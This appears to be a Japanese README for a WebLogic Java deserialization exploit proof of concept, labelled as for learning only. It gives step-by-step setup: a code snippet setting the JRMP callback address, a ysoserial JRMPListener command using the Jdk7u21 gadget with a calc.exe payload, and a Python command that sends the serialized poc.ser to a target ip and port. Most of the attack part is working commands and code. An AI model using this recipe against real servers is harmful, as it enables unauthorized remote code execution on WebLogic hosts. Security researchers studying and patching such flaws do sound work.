
0-sec.org
学習・交流目的のみに使用し、その他の用途による結果は自己責任とします。
関連するjarファイルはすべてプロジェクトにインポート済みであり、利用方法はysoのJRMPを採用しています。学習・デバッグの際に利用方法を変更することができます。
まず、weblogic ディレクトリにある SerializedSystemIni.dat ファイルを security フォルダに配置する必要があります。
次に、yso を ysoserial.jar にリネームし、lib ディレクトリにインポートする必要があります。

次に、weblogic/wsee/jaxws/persistence/PersistentContext.java 内の getObject のIPアドレスとポートを指定します。
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
最後に、リモートでJRMPリスナーを起動し、7u21コマンドを利用して実行します。
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
使用方法: Poc.java を実行して poc.ser シリアライズファイルを生成し、以下のコマンドで送信します。
python weblogic.py ip port poc.ser

